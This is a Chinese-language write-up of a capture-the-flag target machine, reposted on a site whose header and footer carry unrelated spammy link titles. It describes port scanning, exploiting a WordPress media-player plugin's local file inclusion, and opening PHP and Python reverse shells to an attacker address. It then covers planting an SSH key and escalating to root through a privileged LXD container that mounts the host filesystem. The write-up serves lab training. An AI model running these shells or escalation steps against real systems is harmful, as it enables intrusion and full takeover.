当前位置: 首页 > news >正文

做电销哪些网站可以找到客户端永久开源的免费建站系统

做电销哪些网站可以找到客户端,永久开源的免费建站系统,西城做网站,适合设计师看的设计网站前言 这个靶机有亿点难,收获很多。打靶的时候,前面很顺,到创建ssh公钥之后就一点不会了。 1 01 arp扫描,发现有一个130,再查看端口 有22,80,129,445,10123 dirb扫描目录 这…

前言

这个靶机有亿点难,收获很多。打靶的时候,前面很顺,到创建ssh公钥之后就一点不会了。

1

01

arp扫描,发现有一个130,再查看端口
在这里插入图片描述
在这里插入图片描述
有22,80,129,445,10123
dirb扫描目录
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
这里的something里面有一个jarves,应该是用户名称
在这里插入图片描述
继续找,发现upload里有cmd,应该是利用这里上传shell
在这里插入图片描述

02

/wp有一个wordpress,去搜索知道是一个平台,我们可以用wpscan去扫描wordpress,翻LFI是一个本地文件包含漏洞,不知道怎么利用,看wp要利用这里的https://www.exploit-db.com/exploits/46537/

在这里插入图片描述
打开后,找到这一行
在这里插入图片描述
在这里插入图片描述
发现用户jarves
在这里插入图片描述

/server里有一个zip,去搜索了知道,这是gila cms,没什么用处
初步信息收集完成

2

再进行上传shell操作,因为,上文提到的php文件,我这里用php提权
在这里插入图片描述

php -r ‘$sock=fsockopen(“47.192.168.157.128”,2333);exec(“/bin/sh -i <&3 >&3 2>&3”);’

在这里插入图片描述

我这里失败了,换python试试

192.168.157.130/wp/wp-content/plugins/gracemedia-media-player/templates/files/ajax_controller.php?ajaxAction=getIds&cfg=…/…/…/…/…/…/…/…/…/…/home/jarves/upload/shell.php&cmd=python3%20-c%20%27import%20socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((%22192.168.157.128%22,4444));os.dup2(s.fileno(),0);%20os.dup2(s.fileno(),1);%20os.dup2(s.fileno(),2);p=subprocess.call([%22/bin/sh%22,%22-i%22]);%27

在这里插入图片描述
再升级shell
在这里插入图片描述

去home目录查看信息,有jarves
在这里插入图片描述
tmp里没有东西可以利用
在这里插入图片描述
查看/var,var目录的详细信息
在这里插入图片描述

查看/var/www
在这里插入图片描述
在这里插入图片描述
找到root的密码:root
我这里想去ssh连接,发现密码不对
在这里插入图片描述

3

剩下的步骤基本是看wp
要先用两个工具smbclient和enum4linux
在这里插入图片描述
在这里插入图片描述
再创建ssh公钥
在这里插入图片描述

在这里插入图片描述
将id_rsa.pub复制到tmp目录下命名位authorized_keys
在这里插入图片描述
将authorized_keys上传到目标主机的.ssh目录下
在这里插入图片描述

然后使用ssh登录到目标主机

4

发现jarves还属于lxd组
在这里插入图片描述

从github下载构建好的Alpine,然后进行执行
在这里插入图片描述
接着我们将生成的文件上传至目标机器

wget http://192.168.157.130:7777/lxd-alpine-builder/alpine-v3.14-x86_64-20240410_1650.tar.gz

接着我们使用lxd进行初始化

​lxd init

在这里插入图片描述
导入镜像

lxc image import ./alpine-v3.14-x86_64-20240410_1650.tar.gz --alias myimage

进入到容器的命令行
在这里插入图片描述

lxc init myimage ignite -c security.privileged=true

lxc config device add ignite mydevice disk source=/ path=/mnt/root recursive=true

lxc start ignite

lxc exec ignite /bin/sh

替换mnt/root目录下的authorized_keys文件
在这里插入图片描述

最后使用ssh连接拿到root权限

http://www.yayakq.cn/news/643191/

相关文章:

  • 建立英文网站星巴克seo网络推广
  • 优化怎么做网页搜索引擎优化技术
  • 广电基础设施建设官方网站网站换服务器对排名有影响吗
  • 深圳建设工程招投标网站常熟seo关键词优化公司
  • 外贸网站建站方案建设商场黄金网站
  • 网站是如何制作的wordpress插件 速度
  • 时代强个人网站中国风网站建设
  • 罗湖建网站公司上海包装设计公司排名
  • 网站的优化是什么有哪些网站的搜索引擎
  • 公司做网站算什么费用苏州工业园区外国语学校
  • 岳阳建设网站徐州网站简介
  • 特价锦州网站建设山东3个中高风险地区
  • 小公司网站建设现状设计说明书
  • 手机做图纸app下载网站wordpress汉化.po
  • 东莞app培训网站建设设计师主题 wordpress
  • 网站标题栏制作淘宝网页网站
  • 同样是div 怎么有些网站收录少 有些多软件开发工具具有哪些基本功能
  • 网站搭建 主机推荐wordpress 页面重定向循环
  • 生产建设兵团第三师政务网站汕头企业网站建设服务
  • 网站建设的公司价格常州模板网站建设
  • 90后小姑娘做网站建一个在线商城网站
  • 商城开发网站四省网站建设
  • 织梦教育网站模板网站免费模版
  • 做网站要用编程吗wordpress官方模版
  • 网站系统建设管理制度做电影网站需要用什么空间
  • 简述jsp网站开发的环境配置网站策划方案案例
  • 工信部门备案网站获取的icp备案号如何查看vs中建设好的网站
  • 网站个别页面做seo直播系统开发
  • cdr 做网站申京效率值联盟第一
  • 我要用新浪云做网站青海项目信息网官网